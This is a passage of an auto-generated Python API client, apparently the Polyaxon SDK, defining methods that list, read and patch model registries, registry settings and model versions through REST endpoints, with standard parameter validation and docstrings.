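    # `_preload_content=False` skips deserialization; the exact return shape in
    # that case depends on the generated client version.
    #
    #   version = api.get_model_version("acme", "recommender", "v1",
    #                                   _request_timeout=(3.05, 27))
    #   raw = api.get_model_version("acme", "recommender", "v1",
    #                               _preload_content=False)     # raw HTTP response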
def get_model_version_stages(self, owner, entity, name, **kwargs): # noqa: E501
"""Get model version stages # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_version_stages(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Stage
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_model_version_stages_with_http_info(owner, entity, name, **kwargs) # noqa: E501
def get_model_version_stages_with_http_info(self, owner, entity, name, **kwargs): # noqa: E501
"""Get model version stages # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_model_version_stages_with_http_info(owner, entity, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str entity: Entity: project name, hub name, registry name, ... (required)
:param str name: Sub-entity name (required)
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Stage, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'entity',
'name'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_model_version_stages" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `get_model_version_stages`") # noqa: E501
# verify the required parameter 'entity' is set
if self.api_client.client_side_validation and ('entity' not in local_var_params or # noqa: E501
local_var_params['entity'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `entity` when calling `get_model_version_stages`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `get_model_version_stages`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'entity' in local_var_params:
path_params['entity'] = local_var_params['entity'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{entity}/versions/{name}/stages', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Stage', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_model_registries(self, owner, **kwargs): # noqa: E501
"""List registry models # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_registries(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListModelRegistriesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_model_registries_with_http_info(owner, **kwargs) # noqa: E501
def list_model_registries_with_http_info(self, owner, **kwargs): # noqa: E501
"""List registry models # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_registries_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListModelRegistriesResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_model_registries" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_model_registries`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/list', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListModelRegistriesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
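    # Usage sketch (illustrative, placeholder values): listing supports the
    # documented pagination and filtering query parameters. The `results`
    # attribute is assumed from V1ListModelRegistriesResponse.
    #
    #   page = api.list_model_registries("acme", offset=0, limit=20,
    #                                    sort="-created_at",
    #                                    query="name:recommender")
    #   for registry in page.results:
    #       print(registry.name)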
def list_model_registry_names(self, owner, **kwargs): # noqa: E501
"""List registry model names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_registry_names(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListModelRegistriesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_model_registry_names_with_http_info(owner, **kwargs) # noqa: E501
def list_model_registry_names_with_http_info(self, owner, **kwargs): # noqa: E501
"""List registry model names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_registry_names_with_http_info(owner, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListModelRegistriesResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'offset',
'limit',
'sort',
'query'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_model_registry_names" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_model_registry_names`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/names', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListModelRegistriesResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_model_version_names(self, owner, name, **kwargs): # noqa: E501
"""List model versions names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_version_names(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
        :param str mode: Mode of the search.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListModelVersionsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_model_version_names_with_http_info(owner, name, **kwargs) # noqa: E501
def list_model_version_names_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""List model versions names # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_version_names_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
        :param str mode: Mode of the search.
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListModelVersionsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name',
'offset',
'limit',
'sort',
'query',
'mode'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_model_version_names" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_model_version_names`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `list_model_version_names`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'mode' in local_var_params and local_var_params['mode'] is not None: # noqa: E501
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/versions/names', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListModelVersionsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_model_versions(self, owner, name, **kwargs): # noqa: E501
"""List model versions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_versions(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
        :param str mode: Mode of the search.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ListModelVersionsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_model_versions_with_http_info(owner, name, **kwargs) # noqa: E501
def list_model_versions_with_http_info(self, owner, name, **kwargs): # noqa: E501
"""List model versions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_model_versions_with_http_info(owner, name, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str name: Entity managing the resource (required)
:param int offset: Pagination offset.
:param int limit: Limit size.
:param str sort: Sort to order the search.
:param str query: Query filter the search.
        :param str mode: Mode of the search.
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ListModelVersionsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'name',
'offset',
'limit',
'sort',
'query',
'mode'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_model_versions" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `list_model_versions`") # noqa: E501
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `list_model_versions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'sort' in local_var_params and local_var_params['sort'] is not None: # noqa: E501
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'query' in local_var_params and local_var_params['query'] is not None: # noqa: E501
query_params.append(('query', local_var_params['query'])) # noqa: E501
if 'mode' in local_var_params and local_var_params['mode'] is not None: # noqa: E501
query_params.append(('mode', local_var_params['mode'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{name}/versions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ListModelVersionsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_model_registry(self, owner, model_name, body, **kwargs): # noqa: E501
"""Patch registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_registry(owner, model_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model_name: Optional component name, should be a valid fully qualified value: name[:version] (required)
:param V1ModelRegistry body: Model body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_model_registry_with_http_info(owner, model_name, body, **kwargs) # noqa: E501
def patch_model_registry_with_http_info(self, owner, model_name, body, **kwargs): # noqa: E501
"""Patch registry model # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_registry_with_http_info(owner, model_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model_name: Optional component name, should be a valid fully qualified value: name[:version] (required)
:param V1ModelRegistry body: Model body (required)
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistry, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_model_registry" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `patch_model_registry`") # noqa: E501
# verify the required parameter 'model_name' is set
if self.api_client.client_side_validation and ('model_name' not in local_var_params or # noqa: E501
local_var_params['model_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model_name` when calling `patch_model_registry`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_model_registry`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model_name' in local_var_params:
path_params['model.name'] = local_var_params['model_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model.name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistry', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
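    # Usage sketch (illustrative, placeholder values): patching sends a
    # V1ModelRegistry body; `description` is used here only as an example
    # attribute of that model.
    #
    #   import polyaxon_sdk
    #   body = polyaxon_sdk.V1ModelRegistry(name="recommender",
    #                                       description="Updated description")
    #   updated = api.patch_model_registry("acme", "recommender", body)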
def patch_model_registry_settings(self, owner, model, body, **kwargs): # noqa: E501
"""Patch registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_registry_settings(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelRegistrySettings body: Model settings body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelRegistrySettings
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_model_registry_settings_with_http_info(owner, model, body, **kwargs) # noqa: E501
def patch_model_registry_settings_with_http_info(self, owner, model, body, **kwargs): # noqa: E501
"""Patch registry model settings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_registry_settings_with_http_info(owner, model, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param V1ModelRegistrySettings body: Model settings body (required)
        :param _return_http_data_only: response data without status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelRegistrySettings, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_model_registry_settings" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `patch_model_registry_settings`") # noqa: E501
# verify the required parameter 'model' is set
if self.api_client.client_side_validation and ('model' not in local_var_params or # noqa: E501
local_var_params['model'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `model` when calling `patch_model_registry_settings`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_model_registry_settings`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'model' in local_var_params:
path_params['model'] = local_var_params['model'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/{owner}/registry/{model}/settings', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1ModelRegistrySettings', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
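# Illustrative usage of the two methods above (a sketch, not part of the
# generated client; `api` is assumed to be an instance of this API class and
# `settings_body` a populated V1ModelRegistrySettings):
#
#     result = api.patch_model_registry_settings(owner, model, settings_body)
#     # -> V1ModelRegistrySettings
#
#     data, status, headers = api.patch_model_registry_settings_with_http_info(
#         owner, model, settings_body)
#
#     thread = api.patch_model_registry_settings(owner, model, settings_body,
#                                                async_req=True)
#     result = thread.get()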
def patch_model_version(self, owner, model, version_name, body, **kwargs): # noqa: E501
"""Patch model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_version(owner, model, version_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param str version_name: Component name; should be a valid fully qualified value: name[:version] (required)
:param V1ModelVersion body: Model version body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1ModelVersion
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.patch_model_version_with_http_info(owner, model, version_name, body, **kwargs) # noqa: E501
def patch_model_version_with_http_info(self, owner, model, version_name, body, **kwargs): # noqa: E501
"""Patch model version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_model_version_with_http_info(owner, model, version_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str model: Model name (required)
:param str version_name: Component name; should be a valid fully qualified value: name[:version] (required)
:param V1ModelVersion body: Model version body (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it is used as the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1ModelVersion, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'model',
'version_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
